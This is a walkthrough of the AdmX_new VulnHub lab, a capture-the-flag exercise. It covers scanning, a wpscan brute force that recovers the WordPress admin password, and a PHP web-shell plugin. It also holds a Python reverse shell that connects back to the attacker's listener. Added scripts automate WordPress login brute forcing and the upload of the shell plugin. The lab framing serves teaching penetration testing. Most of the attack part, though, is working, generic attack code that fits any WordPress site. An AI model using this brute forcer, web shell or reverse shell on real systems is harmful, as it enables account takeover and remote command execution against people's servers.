Target machine: AdmX_new
Preparation

- VM image: https://download.vulnhub.com/admx/AdmX_new.7z
- After downloading, verify the MD5 against the published value 2948034da23a8acc1285fd40ffcde827. The point of the check is to confirm the download is complete and unmodified (MD5 reliably catches corruption; it is no longer a strong guarantee against deliberate tampering, so treat a match as a download check rather than a proof of authenticity).
  - In cmd:
    certutil -hashfile <file path> MD5
  - In PowerShell:
    Get-FileHash <file path> -Algorithm MD5 | Format-List
- Hypervisor: VirtualBox
- VM network: Host-Only
- Setting up the lab network: https://www.cnblogs.com/shadow-/p/16815020.html
- Kali: NAT + [Bridged/Host-Only] (NAT for internet access, the second adapter on the same Host-Only network as the target)
Special note: the network configuration inside AdmX_new is broken and has to be adjusted before the VM is reachable.
The target runs Ubuntu 20.04 (the kernel seen later, 5.4.0-72-generic, belongs to that release).
How Ubuntu network configuration has changed
- net-tools (ifconfig) has given way to iproute2 (ip).
- ifup/ifdown and the /etc/network/interfaces file are deprecated; configuration now goes through the netplan command and the YAML files under /etc/netplan/.
- netplan reference: https://netplan.io/reference
Fixing the target's network configuration [take a snapshot before doing any of this]

- While the VM is starting (still on the black screen, during the VirtualBox transition), hold Shift to get the GRUB menu.
- Use the arrow keys to move to the second entry (recovery mode) and press e to edit it.
- On the line that ends in `ro recovery nomodeset ...`, replace `ro recovery nomodeset` with `rw single init=/bin/bash`. What follows `nomodeset` may differ from install to install, which is what the ellipsis stands for; keep everything up to the end of the line.
- Press Ctrl+X to boot the edited entry. If the details are unclear, look them up; the core purpose is a root shell on the target without knowing any password. Note that `init=/bin/bash` does more than select single-user mode: it makes bash PID 1, so no systemd and no services are running in this shell. That matters for `netplan apply` below.
- Run `ip a` to look at the interfaces and find the one that is misconfigured; on my VM it was enp0s17. If interface naming is unfamiliar, read up on Linux network interfaces first.
- Edit the network configuration:
  vim /etc/netplan/*.yaml
  There should be exactly one YAML file under /etc/netplan/, and that is the one to change. After editing it looks like this:

```yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
  version: 2
  renderer: networkd
  ethernets:
    enp0s3:
      dhcp4: true
    enp0s17:
      addresses: [192.168.56.200/24]
      gateway4: 192.168.56.1
      nameservers:
        addresses: [192.168.56.100]
```

  The `ethernets` section is what matters. There are two adapters: enp0s3 is the existing one and is left alone; the added enp0s17 entry is the problem interface found with `ip a`. Under it, `addresses` is the static IP we assign, `gateway4` is the default gateway (still accepted on 20.04; newer netplan prefers a `routes:` entry with `to: default`), and `nameservers.addresses` is the DNS resolver list, not a DHCP setting. The value used here is the Host-Only DHCP server's address, which is harmless in an isolated lab because nothing on the target needs name resolution.
- The gateway and DHCP server addresses come from VirtualBox: File --> Host Network Manager, on the adapter you attached the target to in Host-Only mode; both the adapter address and the DHCP server settings are shown there.
- With the YAML written, run
  netplan apply
  to make it take effect. Caveat: `netplan apply` restarts systemd-networkd, which does not exist in an `init=/bin/bash` shell, so the command may fail there. In that case the file is enough: run `sync`, reboot the VM normally, and netplan regenerates the networkd configuration at boot.
- Ubuntu 20.04 network configuration in detail: https://ubuntu.com/server/docs/network-configuration
Attack walkthrough
Finding the target
Discovery with arp-scan turns up the target at 192.168.56.200.
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:53:45:e0 PCS Systemtechnik GmbH
192.168.56.200 08:00:27:a3:25:25 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.144 seconds (119.40 hosts/sec). 3 responded
- `-I` (long form `--interface=`) selects the interface to send ARP requests from. The target sits on the Host-Only network, which is eth1 on this Kali box (eth0 is the NAT adapter), so the scan has to be bound to eth1; `-l` (`--localnet`) derives the address range from that interface's own subnet.
Port scanning with nmap shows only port 80 open on the target, running Apache httpd 2.4.41 (Ubuntu).
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.200
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-31 19:30 CST
Nmap scan report for 192.168.56.200
Host is up (0.0014s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds
- `-A` turns on OS detection, version detection, the default NSE scripts and traceroute. OS fingerprinting needs raw sockets, and this scan was run without sudo, which is why no OS guess appears in the output above; the service version still comes from the banner. `-T4` selects a faster timing template.
- Only nmap's default top 1000 TCP ports were scanned and 999 of them were filtered. Before concluding that 80 is the only service, a full sweep (`nmap -p- -T4 192.168.56.200`) is the usual follow-up.
Probing the HTTP service
Opening http://192.168.56.200:80/ in a browser shows nothing but the stock Apache 2.4.41 "It works" page, so the next step is to look for hidden or unlinked content under http://192.168.56.200:80/. For that we use dirsearch to brute-force directories and files on the web server.
┌──(kali㉿kali)-[~]
└─$ dirsearch --url=192.168.56.200:80/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-_22-10-31_19-42-33.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-10-31_19-42-33.log
Target: http://192.168.56.200:80/
[19:42:33] Starting:
[19:42:37] 403 - 279B - /.htaccess_orig
[19:42:37] 403 - 279B - /.htaccess.sample
[19:42:37] 403 - 279B - /.htaccess_extra
[19:42:37] 403 - 279B - /.ht_wsr.txt
[19:42:37] 403 - 279B - /.htaccess.orig
[19:42:37] 403 - 279B - /.htaccessBAK
[19:42:37] 403 - 279B - /.htaccess_sc
[19:42:37] 403 - 279B - /.htaccessOLD
[19:42:37] 403 - 279B - /.htaccess.bak1
[19:42:37] 403 - 279B - /.htaccess.save
[19:42:37] 403 - 279B - /.html
[19:42:37] 403 - 279B - /.htm
[19:42:37] 403 - 279B - /.htpasswd_test
[19:42:37] 403 - 279B - /.htpasswds
[19:42:37] 403 - 279B - /.htaccessOLD2
[19:42:37] 403 - 279B - /.httr-oauth
[19:42:39] 403 - 279B - /.php
[19:43:33] 200 - 11KB - /index.html
[19:44:05] 403 - 279B - /server-status/
[19:44:05] 403 - 279B - /server-status
[19:44:18] 403 - 279B - /tools/
[19:44:18] 301 - 316B - /tools -> http://192.168.56.200/tools/
[19:44:28] 200 - 7KB - /wordpress/wp-login.php
[19:44:28] 200 - 8KB - /wordpress/
Task Completed
- Live (200) hits:
  http://192.168.56.200:80/index.html
  http://192.168.56.200:80/wordpress/wp-login.php
  http://192.168.56.200:80/wordpress
- And one notable 301:
  http://192.168.56.200:80/tools (it redirects to /tools/, which then answers 403: the directory exists but listing is denied)
Opening http://192.168.56.200:80/wordpress/ in Firefox, the page takes far too long to load and is visibly missing pieces. The page source explains it: the HTML points at 192.168.159.145, the address the VM was built on, rather than the address it has now. Every asset and redirect aimed at that stale host has to be redirected or rewritten in the response. Three ways to do it:
- Burp Suite: intercept and edit the responses.
- The Redirector browser extension. As an aside, the same trick fixes the googleapis problem: many foreign technical sites still load Google APIs resources, which are unreachable from mainland China, so parts of those pages never render; pointing the extension at a domestic mirror makes them load.
- Mitmproxy, which is what we use here.
  - Make sure mitmproxy is installed on your Kali.
  - Start it with the command `mitmproxy`.
  - Ctrl+Shift+D in Kali's terminal splits the window top/bottom: the mitmproxy TUI above, a Bash prompt below. This is only for convenience; skip it if you already know this.
  - Inside mitmproxy, press `:` for command mode and enter
    set map_remote '|~m GET|//192.168.159.145/|//192.168.56.200/'
    The format is |flow-filter|url-regex|replacement: every GET whose URL contains //192.168.159.145/ is sent to //192.168.56.200/ instead, so the browser's requests for the stale host reach the VM.
  - In Firefox, set a proxy: Settings --> Network Settings --> Manual proxy configuration, HTTP Proxy 127.0.0.1, port 8080.
- Now open http://192.168.56.200:80/wordpress/ again.
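The same rewrite as a mitmproxy addon script. This is an added example, not part of the author's setup: it does for requests what the `map_remote` line does and additionally patches Location headers and text bodies, which helps when another tool, not only the browser, goes through the proxy. The addresses are the lab's; the script name used in the usage note is an assumption.

```python
import re

STALE_HOST = "192.168.159.145"  # the address baked into the site (page source, Location headers)
LIVE_HOST = "192.168.56.200"    # the address the VM actually has on the Host-Only network

# Digit guards avoid partial matches such as 192.168.159.1450.
_STALE_RE = re.compile(r"(?<!\d)" + re.escape(STALE_HOST) + r"(?!\d)")


def rewrite_url(url: str) -> str:
    """Point anything aimed at the stale address at the live VM; other URLs pass through untouched."""
    return _STALE_RE.sub(LIVE_HOST, url)


def rewrite_text(text: str) -> str:
    """Same substitution for HTML/CSS/JS bodies, so absolute links never reach the stale host."""
    return _STALE_RE.sub(LIVE_HOST, text)


def rewrite_headers(headers: dict) -> dict:
    """Fix response headers that carry the stale host, chiefly Location on the wp-login.php 302s."""
    return {name: _STALE_RE.sub(LIVE_HOST, value) for name, value in headers.items()}


try:
    from mitmproxy import http  # only importable inside mitmproxy; the functions above work without it

    class RewriteStaleHost:
        def request(self, flow: http.HTTPFlow) -> None:
            # Equivalent of the map_remote line: send the request to the VM instead of the stale address.
            if flow.request.host == STALE_HOST:
                flow.request.host = LIVE_HOST

        def response(self, flow: http.HTTPFlow) -> None:
            if flow.response is None:
                return
            for name, value in list(flow.response.headers.items()):
                if STALE_HOST in value:
                    flow.response.headers[name] = rewrite_url(value)
            content_type = flow.response.headers.get("Content-Type", "")
            if any(kind in content_type for kind in ("text/", "javascript", "json")):
                body = flow.response.get_text(strict=False)
                if body and STALE_HOST in body:
                    flow.response.set_text(rewrite_text(body))

    addons = [RewriteStaleHost()]
except ImportError:
    addons = []
```

Save it as, say, rewrite_stale_host.py and start the proxy with `mitmproxy -s rewrite_stale_host.py`; the Firefox proxy setting stays the same.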
After a look around nothing stands out, so we run dirsearch against http://192.168.56.200:80/wordpress/ as well.
┌──(kali㉿kali)-[~/.mitmproxy]
└─$ dirsearch --url=192.168.56.200:80/wordpress
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-wordpress_22-11-01_12-33-29.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-01_12-33-29.log
Target: http://192.168.56.200:80/wordpress/
[12:33:30] Starting:
[12:33:40] 403 - 279B - /wordpress/.ht_wsr.txt
[12:33:41] 403 - 279B - /wordpress/.htaccess.sample
[12:33:41] 403 - 279B - /wordpress/.htaccess.orig
[12:33:41] 403 - 279B - /wordpress/.htaccess.bak1
[12:33:41] 403 - 279B - /wordpress/.htaccess_extra
[12:33:41] 403 - 279B - /wordpress/.htaccess.save
[12:33:41] 403 - 279B - /wordpress/.htaccess_orig
[12:33:41] 403 - 279B - /wordpress/.htaccessOLD
[12:33:41] 403 - 279B - /wordpress/.htaccess_sc
[12:33:41] 403 - 279B - /wordpress/.htaccessOLD2
[12:33:41] 403 - 279B - /wordpress/.htaccessBAK
[12:33:41] 403 - 279B - /wordpress/.htm
[12:33:41] 403 - 279B - /wordpress/.httr-oauth
[12:33:41] 403 - 279B - /wordpress/.htpasswd_test
[12:33:41] 403 - 279B - /wordpress/.htpasswds
[12:33:41] 403 - 279B - /wordpress/.html
[12:33:46] 403 - 279B - /wordpress/.php
[12:33:55] 301 - 0B - /wordpress/0 -> http://192.168.56.200/wordpress/0/
[12:34:05] 301 - 0B - /wordpress/Citrix//AccessPlatform/auth/clientscripts/cookies.js -> http://192.168.56.200/wordpress/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[12:34:09] 301 - 0B - /wordpress/New%20folder%20(2) -> http://192.168.56.200/wordpress/New%20folder%20(2
[12:34:09] 301 - 0B - /wordpress/PMA2/index.php -> http://192.168.56.200/wordpress/PMA2/
[12:34:10] 301 - 0B - /wordpress/PMA/index.php -> http://192.168.56.200/wordpress/PMA/
[12:34:28] 301 - 0B - /wordpress/adm/index.php -> http://192.168.56.200/wordpress/adm/
[12:34:29] 302 - 0B - /wordpress/admin -> http://192.168.159.145/wordpress/wp-admin/
[12:34:30] 301 - 0B - /wordpress/admin. -> http://192.168.56.200/wordpress/admin
[12:34:31] 302 - 0B - /wordpress/admin/ -> http://192.168.159.145/wordpress/wp-admin/
[12:34:32] 301 - 0B - /wordpress/admin/index.php -> http://192.168.56.200/wordpress/admin/
[12:34:33] 301 - 0B - /wordpress/admin/mysql/index.php -> http://192.168.56.200/wordpress/admin/mysql/
[12:34:33] 301 - 0B - /wordpress/admin/mysql2/index.php -> http://192.168.56.200/wordpress/admin/mysql2/
... ... ...
... ... ...
[12:38:02] 301 - 0B - /wordpress/wp-register.php -> http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 - 630B - /wordpress/wp-json/wp/v2/users/
[12:38:02] 200 - 96KB - /wordpress/wp-json/
[12:38:02] 302 - 0B - /wordpress/wp-signup.php -> http://192.168.159.145/wordpress/wp-login.php?action=register
[12:38:02] 200 - 49KB - /wordpress/wp-includes/
[12:38:02] 301 - 0B - /wordpress/www/phpMyAdmin/index.php -> http://192.168.56.200/wordpress/www/phpMyAdmin/
[12:38:03] 301 - 0B - /wordpress/xampp/phpmyadmin/index.php -> http://192.168.56.200/wordpress/xampp/phpmyadmin/
[12:38:03] 405 - 42B - /wordpress/xmlrpc.php
- This run is far more productive. Focus on the 200 and 301 results; some WordPress knowledge helps to spot quickly which of them matter.
- Two findings stand out:
  - /wordpress/wp-login.php is the login form for the administration back end (wp-admin).
  - /wordpress/wp-json/wp/v2/users/ answers 200: the REST API lists the site's authors, including their login slugs, so the user name for the brute force below can be read from it rather than guessed. (The 302 redirects to 192.168.159.145 confirm that the site URL is still the stale address.)
Here we use wpscan, a WordPress-specific scanner, against http://192.168.56.200/wordpress/. Note that wpscan has to be run through the proxy.
┌──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ --proxy http://127.0.0.1:8080 1 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov 1 20:20:27 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:08 <==============================================> (137 / 137) 100.00% Time: 00:00:08
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Nov 1 20:20:46 2022
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 53.828 KB
[+] Data Received: 106.023 KB
[+] Memory used: 193.719 MB
[+] Elapsed time: 00:00:19
- The proxy is needed because of the server's redirects to the stale address described earlier.
- WordPress version 5.7.1 was identified.
With wpscan working, brute-force the back-end password with
wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080
┌──(kali㉿kali)-[~/workspace]
└─$ wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin --proxy http://127.0.0.1:8080
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[proxychains] Strict chain ... 127.0.0.1:8080 ... 192.168.56.200:80 ... OK
[+] URL: http://192.168.56.200/wordpress/ [192.168.56.200]
[+] Started: Tue Nov 1 18:41:55 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.200/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.200/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.200/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.200/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.200/wordpress/, Match: 'WordPress 5.7.1'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:04 <==============================================> (137 / 137) 100.00% Time: 00:00:04
[i] No Config Backups Found.
[SUCCESS] - admin / adam14
Trying admin / Adm123 Time: 00:00:01 <==== > (20 / 236) 8.47% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: adam14
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Nov 1 18:42:07 2022
[+] Requests Done: 160
[+] Cached Requests: 30
[+] Data Sent: 49.889 KB
[+] Data Received: 61.955 KB
[+] Memory used: 204.188 MB
[+] Elapsed time: 00:00:12
- Reading the command
  proxychains wpscan --url http://192.168.56.200/wordpress/ -P ./password.txt -U admin
  - proxychains routes wpscan through the proxy (the `[proxychains]` line in the output shows this run used it instead of `--proxy`; both end up at mitmproxy on 127.0.0.1:8080).
  - `-P` is the password wordlist; ./password.txt is the dictionary used here.
  - `-U` is the user name to attack; we target admin because it is the administrative account.
- The brute force finds the password: adam14
  [!] Valid Combinations Found: | Username: admin, Password: adam14
  WordPress core has no lockout or rate limit on wp-login.php, so each guess is one plain POST and the run finishes in seconds.
About the wordlist:
- Look for high-quality weak-password lists online.
- Generate one with crunch, john's rule-based mangling, or hydra's -x mode (which builds candidates on the fly); generated lists quickly become large.
- Or use Kali's bundled wordlists, which are usually only barely adequate.
The same brute force could be done with john or hydra, but with more setup. wpscan is a purpose-built tool, and during a penetration test choosing the targeted tool for the target's technology is the more efficient route.
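What wpscan -U/-P does under the hood, as an added example (not the author's code and not part of wpscan): read the user names from the REST endpoint found by dirsearch, then POST each candidate password to wp-login.php and recognise success by the 302 plus the wordpress_logged_in_ session cookie. The form field names and the test-cookie rule are WordPress 5.x behaviour as I know it and are assumptions here; the lab address is the page's; the REST reply used for the offline check is constructed.

```python
import http.client
import json
import urllib.parse
from typing import Iterable, List, Optional

TARGET_HOST = "192.168.56.200"  # lab address from this page
WP = "/wordpress"

# Constructed sample shaped like the /wp-json/wp/v2/users/ reply (the lab's was 630 B).
SAMPLE_USERS_JSON = ('[{"id":1,"name":"admin","slug":"admin",'
                     '"link":"http://192.168.159.145/wordpress/author/admin/"}]')


def usernames_from_rest(body: str) -> List[str]:
    """'slug' is the login name; the display 'name' can differ from it."""
    return [u["slug"] for u in json.loads(body) if "slug" in u]


def login_succeeded(status: int, set_cookie: Iterable[str]) -> bool:
    """Right password: 302 (to wp-admin) plus a wordpress_logged_in_<hash> cookie.
    Wrong password: the form is rendered again with 200 and no session cookie."""
    return status == 302 and any(c.startswith("wordpress_logged_in_") for c in set_cookie)


def try_login(user: str, password: str) -> bool:
    """One POST to wp-login.php; the redirect is not followed because it points at 192.168.159.145."""
    form = urllib.parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})
    conn = http.client.HTTPConnection(TARGET_HOST, 80, timeout=10)
    conn.request("POST", f"{WP}/wp-login.php", form, {
        "Content-Type": "application/x-www-form-urlencoded",
        # wp-login.php rejects a POST carrying testcookie=1 unless this cookie is present
        "Cookie": "wordpress_test_cookie=WP+Cookie+check",
    })
    resp = conn.getresponse()
    hit = login_succeeded(resp.status, resp.headers.get_all("Set-Cookie") or [])
    conn.close()
    return hit


def fetch_usernames() -> List[str]:
    """Ask the REST API for the author list; an empty list means the endpoint is closed."""
    conn = http.client.HTTPConnection(TARGET_HOST, 80, timeout=10)
    conn.request("GET", f"{WP}/wp-json/wp/v2/users/")
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return usernames_from_rest(body) if resp.status == 200 else []


def brute_force(user: str, wordlist: str) -> Optional[str]:
    """Sequential guesses; WordPress core has no lockout or rate limit, which is what wpscan -P relies on."""
    with open(wordlist, encoding="utf-8", errors="ignore") as fh:
        for line in fh:
            password = line.rstrip("\n")
            if password and try_login(user, password):
                return password
    return None


if __name__ == "__main__":
    import sys
    wordlist = sys.argv[1] if len(sys.argv) > 1 else "password.txt"
    for user in fetch_usernames() or ["admin"]:
        print(user, "->", brute_force(user, wordlist) or "no hit")
```

Run it as `python3 wp_brute.py ./password.txt` from the Kali box; no proxy is needed because the script never follows the redirect to the stale host.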
Attacking the WordPress back end
We know the version is 5.7.1 and we can log in to the administration interface. Options:
- Media tab: upload a web shell (WordPress refuses .php uploads there by default, so this needs a bypass).
- Appearance -> Theme Editor: inject PHP into the theme's 404 template.
- A malicious plugin.
We go with the plugin, because it gives the most room to work.
- Write the plugin, upload it through the plugin installer and activate it. The uploader expects a zip; the file inside only needs the `Plugin Name:` header for WordPress to accept it. Activation is not actually required for this shell: the file is requested directly from disk, so Apache executes it whether or not WordPress has loaded the plugin.

```php
<?php
/*
Plugin Name: WebShell
Plugin URI: https://yunju.blog.csdn.net/
Description: mu
Author: myname
Version: 1.0
Author URI: https://yunju.blog.csdn.net/
*/
// Deliberately a command shell: ?cmd=<command> runs it as the web server user (www-data)
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
```

- Test it in the browser:
  http://192.168.56.200/wordpress/wp-content/plugins/shell.php?cmd=id
  The path depends on how the zip was laid out: WordPress unpacks it into a directory under wp-content/plugins/, and the shell prompt further down shows the file under wp-content/plugins/shell/, so for that layout the URL is .../wp-content/plugins/shell/shell.php?cmd=id.
- Start a listener locally:
  netcat -nvlp 4444
- Testing shows python3 is present on the target.
- Try a Python reverse shell:

```python
import os, subprocess, socket

# AF_INET selects IPv4, SOCK_STREAM a stream (TCP) socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect back to the Kali listener (netcat -nvlp 4444)
s.connect(("192.168.56.111", 4444))
# duplicate the socket onto stdin, stdout and stderr so the shell's I/O travels over it
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# spawn an interactive shell attached to those descriptors
p = subprocess.call(["/bin/sh", "-i"])
```

  Collapsed onto one line so it can be passed to python3 -c:
  python3 -c 'import os,subprocess,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.111",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Put that in place of `id` in the cmd parameter and request it. The command has to be URL-encoded when it goes into the query string (a browser does this for spaces; from the command line `curl -G --data-urlencode "cmd=..." <url>` does it for everything).
The same attack can also be carried out with metasploit-framework.
┌──(kali㉿kali)-[~/workspace]
└─$ netcat -nlvp 4444 1 ⨯
listening on [any] 4444 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.200] 36466
bash: cannot set terminal process group (990): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wp:/var/www/html/wordpress/wp-content/plugins/shell$
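The plugin step automated, as an added example (not the author's code and not a WordPress API): package the shell from above as a zip with the layout the installer expects, fetch the upload form's nonce, post the archive to update.php, and build the properly encoded trigger URL. The field names (_wpnonce, pluginzip), the form locations and the nonce markup are WordPress 5.x behaviour as I know it and are assumptions here; the session cookie is copied from the browser session that is already logged in as admin; the lab address and the shell.php file name are the page's.

```python
import http.client
import io
import re
import urllib.parse
import uuid
import zipfile
from typing import Dict, List, Optional, Tuple

TARGET_HOST = "192.168.56.200"  # lab address from this page
WP = "/wordpress"

# Same command shell as the plugin above; the "Plugin Name:" header is all WordPress requires.
WEBSHELL_PHP = """<?php
/*
Plugin Name: WebShell
*/
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
"""


def build_plugin_zip(slug: str, php: str) -> bytes:
    """The installer unpacks the zip under wp-content/plugins/<top-level dir>/, so the shell
    ends up at plugins/<slug>/<slug>.php, which is where the shell prompt above shows it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", php)
    return buf.getvalue()


def zip_entries(data: bytes) -> List[str]:
    """Member names of a zip held in memory (check the layout before uploading)."""
    return zipfile.ZipFile(io.BytesIO(data)).namelist()


def extract_nonce(html: str) -> Optional[str]:
    """wp_nonce_field() emits <input ... name="_wpnonce" value="..." />; the upload is refused without it."""
    m = re.search(r'name="_wpnonce"[^>]*value="([0-9a-f]+)"', html)
    return m.group(1) if m else None


def shell_url(slug: str, command: str) -> str:
    """Trigger URL; urlencode() escapes the quotes, spaces and parentheses of a python3 -c payload."""
    return f"http://{TARGET_HOST}{WP}/wp-content/plugins/{slug}/{slug}.php?" + urllib.parse.urlencode({"cmd": command})


def multipart(fields: Dict[str, str], zip_name: str, data: bytes) -> Tuple[str, bytes]:
    """Hand-built multipart/form-data body; the installer reads the archive from the pluginzip field."""
    b = uuid.uuid4().hex
    parts = [f'--{b}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'.encode()
             for k, v in fields.items()]
    parts.append(f'--{b}\r\nContent-Disposition: form-data; name="pluginzip"; filename="{zip_name}"\r\n'
                 "Content-Type: application/zip\r\n\r\n".encode() + data + b"\r\n")
    parts.append(f"--{b}--\r\n".encode())
    return f"multipart/form-data; boundary={b}", b"".join(parts)


def _request(method: str, path: str, cookie: str, body: Optional[bytes] = None,
             ctype: Optional[str] = None) -> Tuple[int, str]:
    """Single request with the admin's cookies; redirects are never followed (they point at the stale host)."""
    conn = http.client.HTTPConnection(TARGET_HOST, 80, timeout=15)
    headers = {"Cookie": cookie}
    if ctype:
        headers["Content-Type"] = ctype
    conn.request(method, path, body, headers)
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, text


def upload_shell(cookie: str, slug: str = "shell") -> bool:
    """cookie: the wordpress_logged_in_* / wordpress_* cookies of an Administrator session
    (upload_plugins capability; fails if DISALLOW_FILE_MODS is set in wp-config.php)."""
    _, page = _request("GET", f"{WP}/wp-admin/plugin-install.php?tab=upload", cookie)
    nonce = extract_nonce(page)
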